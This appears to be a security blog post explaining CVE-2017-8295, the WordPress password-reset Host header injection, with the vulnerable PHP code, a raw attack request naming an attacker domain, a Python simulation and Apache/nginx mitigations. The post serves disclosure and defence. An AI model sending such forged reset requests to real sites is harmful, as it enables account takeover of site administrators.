All versions of WordPress are vulnerable



Yes, as the title says: all versions of WordPress are vulnerable to a zero-day that lets an attacker steer where password-reset mails are addressed from.

On May 3, 2017, a new vulnerability (CVE-2017-8295) was published that affects all versions of WordPress (WP), including the latest at the time, 4.7.4. It can allow an unauthenticated attacker to trigger a password reset for any user and, if the reset mail ends up in the attacker's hands, to reset that user's password and take control of the site.

The vulnerability is in the password reset request flow, specifically in the fact that the contents of the SERVER_NAME variable can be influenced by the client. The relevant code is in wp-includes/pluggable.php:

if ( ! isset( $from_email ) ) {
        // Get the site domain and get rid of www.
        $sitename = strtolower( $_SERVER['SERVER_NAME'] );
        if ( substr( $sitename, 0, 4 ) == 'www.' ) {
                $sitename = substr( $sitename, 4 );
        }

        $from_email = 'wordpress@' . $sitename;
}

WordPress uses the SERVER_NAME variable to build the From and Return-Path headers of the mail. The problem is that most web servers, Apache among them, fill SERVER_NAME from the hostname supplied by the client in the HTTP Host header. In Apache this is the behaviour of UseCanonicalName Off, which is the default:

https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname

Since SERVER_NAME follows the Host header, an attacker can set the Host header to a domain they control when requesting the reset:

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

The result is that $from_email in WordPress becomes wordpress@injected-attackers-mxserver.com.

This generates an outgoing password-reset mail with that address in both From and Return-Path, so any bounce or reply to the message goes to the attacker's mail server rather than to the site.
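To make the data flow concrete, here is an added example (not WordPress code and not from the original post) that parses the request above, emulates how Apache fills SERVER_NAME under UseCanonicalName Off versus On, mirrors the pluggable.php fallback in Python and assembles the reset mail the way wp_mail() would address it. The request bytes, the site name victim-blog.example and the reset link are constructed for the demonstration.

```python
"""Simulation of the CVE-2017-8295 sender derivation (added example)."""
from __future__ import annotations

from email.message import EmailMessage
from typing import Optional
from urllib.parse import parse_qs

# Constructed raw request with the same shape as the one shown in the post.
RAW_REQUEST = (
    b"POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1\r\n"
    b"Host: injected-attackers-mxserver.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 56\r\n"
    b"\r\n"
    b"user_login=admin&redirect_to=&wp-submit=Get+New+Password"
)


def parse_request(raw: bytes) -> tuple[dict[str, str], dict[str, str]]:
    """Split a raw HTTP/1.1 request into (lower-cased headers, form fields)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    header_lines = head.decode("iso-8859-1").split("\r\n")[1:]  # drop request line
    headers: dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # keep_blank_values so redirect_to= survives, as it would in PHP's $_POST
    form = {k: v[0] for k, v in parse_qs(body.decode(), keep_blank_values=True).items()}
    return headers, form


def server_name(headers: dict[str, str], canonical_name: Optional[str] = None) -> str:
    """Emulate how Apache fills SERVER_NAME for the PHP process.

    UseCanonicalName Off (the default): the value is taken from the client's
    Host header. UseCanonicalName On: it is the configured ServerName, no
    matter what the client sent. The port suffix is dropped in both cases.
    """
    if canonical_name is not None:
        return canonical_name
    return headers.get("host", "").split(":", 1)[0]


def wordpress_from_email(server_name_value: str) -> str:
    """Python mirror of the pluggable.php fallback: wordpress@<SERVER_NAME minus www.>."""
    sitename = server_name_value.lower()
    if sitename.startswith("www."):
        sitename = sitename[4:]
    return "wordpress@" + sitename


def sender_for(raw: bytes, canonical_name: Optional[str] = None) -> str:
    """Sender address WordPress would use for a reset triggered by this request."""
    headers, _ = parse_request(raw)
    return wordpress_from_email(server_name(headers, canonical_name))


def build_reset_mail(headers: dict[str, str], to_addr: str, reset_link: str,
                     canonical_name: Optional[str] = None) -> EmailMessage:
    """Assemble the reset mail with From and Return-Path set as wp_mail() would."""
    from_email = wordpress_from_email(server_name(headers, canonical_name))
    msg = EmailMessage()
    msg["From"] = f"WordPress <{from_email}>"
    msg["Return-Path"] = from_email  # bounces and many auto-replies end up here
    msg["To"] = to_addr
    msg["Subject"] = "Password Reset"
    msg.set_content(f"To reset your password, visit the following address:\n{reset_link}\n")
    return msg


if __name__ == "__main__":
    hdrs, form = parse_request(RAW_REQUEST)
    # Constructed reset link; the key is a placeholder, not a real WordPress token.
    link = "https://victim-blog.example/wp-login.php?action=rp&key=EXAMPLEKEY&login=" + form["user_login"]
    print("UseCanonicalName Off ->", sender_for(RAW_REQUEST))
    print("UseCanonicalName On  ->", sender_for(RAW_REQUEST, canonical_name="victim-blog.example"))
    print(build_reset_mail(hdrs, "admin@victim-blog.example", link))
```

Running it shows the attacker-controlled domain in From and Return-Path for the default configuration, and the configured ServerName once a canonical name is pinned; every other part of the message, including the reset link for the admin account, is identical in both cases.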

In short, if the username of the administrator or of any other target user is known, the reset link can reach the attacker through any path that sends the mail back to its sender address: a bounce to the Return-Path (for example if the victim's mailbox is full or unreachable), an auto-reply from the victim's mail system, or the victim replying to the unexpected message. With that link the attacker resets the password of the account. At the moment there is no official fix; the recommended mitigation is to pin SERVER_NAME by enabling UseCanonicalName together with an explicit ServerName in the web server configuration. At the application level, the wp_mail_from filter can be used to set a static sender address, because pluggable.php passes the derived address through that filter before sending.
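The server-side mitigation as an added configuration example (not from the original post): with UseCanonicalName On, Apache sets SERVER_NAME from the ServerName of the virtual host that handled the request, so the Host header no longer reaches the $from_email fallback. The host names and document root are placeholders.

```apache
# Mitigation for CVE-2017-8295 on Apache httpd 2.4 (added example).
# UseCanonicalName On makes SERVER_NAME equal to this vhost's ServerName,
# whatever Host header the client sends. Every vhost on the server needs
# a ServerName, because a request with an unknown Host is served by the
# first (default) vhost and takes its ServerName.
UseCanonicalName On

<VirtualHost *:443>
    ServerName  blog.example.com        # placeholder: the site's real hostname
    ServerAlias www.blog.example.com
    DocumentRoot /var/www/blog          # placeholder path
</VirtualHost>
```

To verify the change, request a one-line PHP file that echoes $_SERVER['SERVER_NAME'] while sending a forged Host header (for example with curl -H 'Host: attacker.example'); after the change the output must be the configured ServerName. On nginx, check that the fastcgi_params passed to PHP set SERVER_NAME from $server_name and not from $host, since $host carries the client-supplied header.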

Update: As can be seen, the attack is not self-contained. The attacker still needs the reset mail to come back to the injected sender address, whether through a bounce, an auto-reply or the victim replying to the message, so a degree of luck or interaction with the victim's mail flow is required; the victim clicking the link does not help the attacker.

Reference:
https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html


